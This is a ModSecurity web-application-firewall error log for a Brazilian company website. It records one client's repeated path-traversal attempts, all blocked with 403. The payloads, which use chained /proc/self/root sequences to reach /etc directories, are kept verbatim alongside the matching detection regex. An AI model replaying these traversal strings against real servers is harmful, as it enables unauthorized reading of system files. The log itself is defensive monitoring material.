[Mon Mar 16 14:41:05.447877 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.241.46:53264] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhAsXjZBu2q05ozVU9kSAAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:41:37.599786 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.241.46:58006] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA0Zqj1wV0Si-Okef5vQAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:38.974386 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:38040] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA0tSswJuvopo3lOhpIQAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:40.265264 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.241.46:38056] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA1LysWC90G-1nBrBOdQAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:41.828408 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.241.46:38066] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA1Y6lpbStxTqkSkt2NgAAAk0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:43.269171 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:38076] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA146lpbStxTqkSkt2NwAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:44.672685 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.241.46:38084] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA2I6lpbStxTqkSkt2OgAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:45.984650 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.241.46:38090] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA2XjZBu2q05ozVU9kUAAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:47.451977 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:38094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA27ABkC4fWIHEf8H5hwAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:48.734855 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.241.46:56750] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA3Jqj1wV0Si-Okef5wAAAABE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:50.144006 2026] [:error] [pid 14895:tid 140411574073088] [client 74.7.241.46:56760] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA3lajLEzk2WiQ-10czQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:51.439916 2026] [:error] [pid 10831:tid 140411565680384] [client 74.7.241.46:56772] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA346lpbStxTqkSkt2OwAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:55.540694 2026] [:error] [pid 10651:tid 140411565680384] [client 74.7.241.46:56788] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA47ysWC90G-1nBrBOewAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:56.904900 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.241.46:56798] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA5KQpVkWug9HeOt9AngAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:41:58.257247 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.241.46:41146] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA5rABkC4fWIHEf8H5igAAAEs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:00.887534 2026] [:error] [pid 10772:tid 140411666392832] [client 74.7.241.46:41152] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA6P9ocpUE4ed4uDz6AwAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:02.232262 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:41162] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA6tSswJuvopo3lOhpLAAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:05.507034 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.241.46:41174] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA7XjZBu2q05ozVU9kVwAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:07.974635 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:41178] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA71ajLEzk2WiQ-10c0gAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:10.524942 2026] [:error] [pid 14895:tid 140411632822016] [client 74.7.241.46:35554] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA8VajLEzk2WiQ-10c0wAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:10.531600 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.228.16:33040] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhA8Y6lpbStxTqkSkt2TAAAAlA"]
[Mon Mar 16 14:42:12.096166 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.241.46:35562] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhA9KTCbgAP5jq5Teg2vQAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:42:13.365818 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:35568] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] 